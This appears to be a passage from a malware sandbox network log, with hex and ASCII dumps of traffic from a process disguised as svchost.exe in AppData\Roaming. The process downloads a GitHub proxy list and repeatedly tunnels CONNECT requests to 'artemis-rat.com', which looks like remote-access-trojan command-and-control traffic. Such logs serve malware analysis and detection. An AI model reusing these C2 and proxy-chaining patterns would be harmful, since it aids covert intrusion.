2f Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_
2024-03-09 12:14:26 UTC	1370	IN	Data Raw: 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 61 63 74 2d 6c 69 62 2d 31 66 62 66 63 35 62 65 32 63 31 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 6f 63 74 69 63 6f 6e 73 2d 72 65 61 63 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 Data Ascii: hub.githubassets.com/assets/react-lib-1fbfc5be2c18.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	57178	172.67.140.87	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:29 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:29 UTC	161	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: -
2024-03-09 12:14:29 UTC	155	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	57177	172.67.140.87	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:29 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:29 UTC	161	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: -
2024-03-09 12:14:29 UTC	155	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	59163	222.255.238.159	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:32 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:33 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:14:33 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	59424	102.223.20.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:33 UTC	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
2024-03-09 12:14:33 UTC	192	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:33 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-03-09 12:14:33 UTC	613	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	60799	140.82.113.3	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-09 12:14:35 UTC	101	OUT	GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-03-09 12:14:36 UTC	506	IN	HTTP/1.1 200 OK Server: GitHub.com Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With ETag: W/"736507163a5fb79617a9c43dc0d243c4" Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-03-09 12:14:36 UTC	3594	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-03-09 12:14:36 UTC	21	IN	Data Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: connection: close
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
2024-03-09 12:14:36 UTC	1370	IN	Data Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
